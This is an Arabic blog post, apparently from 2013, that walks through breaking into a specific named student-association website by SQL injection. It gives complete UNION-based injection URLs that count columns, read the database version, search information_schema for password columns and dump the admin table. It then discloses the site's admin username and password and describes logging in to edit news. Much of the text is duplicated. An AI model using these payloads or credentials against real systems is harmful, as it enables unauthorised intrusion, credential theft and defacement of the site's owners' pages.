الأربعاء، 10 أبريل 2013
اختراق مواقع مصابة بثغرة sql injection
السلام عليكم معكم اخوكم simo sol اليوم باذن الله سأتطرق لكيفية اختراق مواقع مصابة بثغرة sql injection أو حقن تعليمات الاستعلام البنيوية
(SQL) بإضافات. الهدف هو إستغلال أي ثغرة أمنية موجودة بطبقة قاعدة وهنا
في الاسفل سترون التطبيق على الموقع وانشاء الله في درسنا القادم سنتطرق
لكيفية البحث على هذه المواقع وعلى البرنآمج الذي نستعمله وكيفية التخفي
عند عملية الاختراق
حلو جدا انا اعرف عدد الجداول الموجوده وش اسوي
راح نستخدم امر
order+by
يكون هكذا الاستغلال
اتمنى ان ينال الدرس اعجابكم
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=2
ح الاستغلال كدا
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=2'
حلو جدا انا اعرف عدد الجداول الموجوده وش اسوي
راح نستخدم امر
order+by
يكون هكذا الاستغلال
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+order+by+6--
كدا حلو ما ظهر لنا خطأ
يبقي عدد 6 في الجداول موجود
طيب الحين نزود عدد 6 الى 7 و 8 لحد ما يظهر لنا الخطأ
طيب الحين نزود عدد ليصبح عدد الجداول 7
يبقي عدد 6 في الجداول موجود
طيب الحين نزود عدد 6 الى 7 و 8 لحد ما يظهر لنا الخطأ
طيب الحين نزود عدد ليصبح عدد الجداول 7
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+order+by+7--
ظهر لنا الخطأ
وكدا نعلم ان عدد الجداول المصابه في الموقع هم 6 لان الموقع اشتغل عند هذا العدد
الحين نستخدم امر union+select لكي نظهر الجداول المصابه بالموقع
ونضع عدد الجداول الى هم + وراح يصبح الاستغلال كدا
وكدا نعلم ان عدد الجداول المصابه في الموقع هم 6 لان الموقع اشتغل عند هذا العدد
الحين نستخدم امر union+select لكي نظهر الجداول المصابه بالموقع
ونضع عدد الجداول الى هم + وراح يصبح الاستغلال كدا
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,3,4,5,6--
يجب ان
لا ننس ان نضع علامه - قبل الرقم المتغير الى هوه رقم 2
حلو الحين عندنا الجدول رقم 3 ورقم 4 مصابين كما بالصوره
الحين نشوف اصدار القاعده
نضع امر version() في العمود المصاب
هذا استغلال بسيط
لا ننس ان نضع علامه - قبل الرقم المتغير الى هوه رقم 2
حلو الحين عندنا الجدول رقم 3 ورقم 4 مصابين كما بالصوره
الحين نشوف اصدار القاعده
نضع امر version() في العمود المصاب
هذا استغلال بسيط
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,3,version(),5,6--
حلو
الحين جدا ظهر لنا الاصدار الخامس
احسن شيئ في الاصدار الخامس ممكن تطلع اسماء الجداول من غير ما تخمن وهذي الميزه حلوه جدا
حلو الحين راح نستخدم امر الاستعلام هذا
الحين جدا ظهر لنا الاصدار الخامس
احسن شيئ في الاصدار الخامس ممكن تطلع اسماء الجداول من غير ما تخمن وهذي الميزه حلوه جدا
حلو الحين راح نستخدم امر الاستعلام هذا
كود PHP:
+from+information_schema.columns+WHERE+column_nam e+LIKE+
امسح المسافات من كلمه نيم
بعد كلمه Like راح نضيف تشفير الى بدينا نبحث عنه داخل قواعد البينات
وراح ارفق لكم بعض التشفيرات
وراح نضع في العمود المصاب
هذا الاستعلام
concat(table_nam e,0x3e,column_nam e,0x3e,table_schema)
امسح المسافات من كلمه نيم
الحين بيصبح الاستغلال
كدا
بعد كلمه Like راح نضيف تشفير الى بدينا نبحث عنه داخل قواعد البينات
وراح ارفق لكم بعض التشفيرات
وراح نضع في العمود المصاب
هذا الاستعلام
concat(table_nam e,0x3e,column_nam e,0x3e,table_schema)
امسح المسافات من كلمه نيم
الحين بيصبح الاستغلال
كدا
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,3,concat(table_nam e,0x3e,column_nam e,0x3e,table_schema),5,6+from+information_schema.columns+WHERE+column_nam e+LIKE+char(37, 112, 97, 115, 115, 37)--
امسح المسافات من كلمه نيم
طبعا التشفير الموجود بعد كلمه Like هوه لكلمه %pass%
وهذي العلامه % تعني ان ممكن يكون اسمه قبل pass او بعده
والتشفير
طبعا التشفير الموجود بعد كلمه Like هوه لكلمه %pass%
وهذي العلامه % تعني ان ممكن يكون اسمه قبل pass او بعده
والتشفير
كود PHP:
char(37, 112, 97, 115, 115, 37)
هوه الى راح نغيرو للبحث بأسماء
اخري مثل %user% و %login% و %admin% تم وضع مرفقات مع الدرس
وهكذا بعد ما كتبنا الاستغلال نشوف وش النتيجه
حلو تم استخراج البينات المطلوبه
admin>password>nyucssamember
admin : اسم الجدول
Password : ام العمود
الحين نروح نستخدم البينات الى احنا طلعناها علشان نجيب اسم اليوزر حقت الادمن والباسورد
رجع لاظهاء الجداول المصابه مره اخري
اخري مثل %user% و %login% و %admin% تم وضع مرفقات مع الدرس
وهكذا بعد ما كتبنا الاستغلال نشوف وش النتيجه
حلو تم استخراج البينات المطلوبه
admin>password>nyucssamember
admin : اسم الجدول
Password : ام العمود
الحين نروح نستخدم البينات الى احنا طلعناها علشان نجيب اسم اليوزر حقت الادمن والباسورد
رجع لاظهاء الجداول المصابه مره اخري
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,3,4,5,6--
الحين نستخدم امر
+from+اسم الجدول --
وفي العمود المصاب نضع password الى استخرجناها
والجدول طبعأ بيكون admin
يعني يصبح هكذا
+from+اسم الجدول --
وفي العمود المصاب نضع password الى استخرجناها
والجدول طبعأ بيكون admin
يعني يصبح هكذا
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,password,4,5,6+From+admin--
جيد
جدا الان الاتغلال ظهر لنا الباسورد الى احنا طلبناه حق الادمن
والباسورد هوه spc1234
طيب الحين نجرب نفس الاستغلال ونبدأ password بـ usernam eعلشان نطلع يوزر
الادمن
اليوزر هوه spc
طيب الحين كل شيئ تمام الان نروح للوحه الموقع وانت الى عليك تخمنها
احيانا بتكون
admin.php
login.php
control.php
ومسار اللوحه
جدا الان الاتغلال ظهر لنا الباسورد الى احنا طلبناه حق الادمن
والباسورد هوه spc1234
طيب الحين نجرب نفس الاستغلال ونبدأ password بـ usernam eعلشان نطلع يوزر
الادمن
اليوزر هوه spc
طيب الحين كل شيئ تمام الان نروح للوحه الموقع وانت الى عليك تخمنها
احيانا بتكون
admin.php
login.php
control.php
ومسار اللوحه
كود PHP:
http://www.cssanyu.org/news/login.php?
الحين معنا اليوزر والباس ندخلهم
ونضغط login
طيب حلو اكيد كل موقع واللوحه حقو تختلف عن الاخري
الان نذهب للاخبار = news
ونضغط Edit
ولان ندخل ونجرب على الموقع المستهذف
ونضغط login
طيب حلو اكيد كل موقع واللوحه حقو تختلف عن الاخري
الان نذهب للاخبار = news
ونضغط Edit
ولان ندخل ونجرب على الموقع المستهذف
تصنيف : ثغرات
0 التعليقات:
إرسال تعليق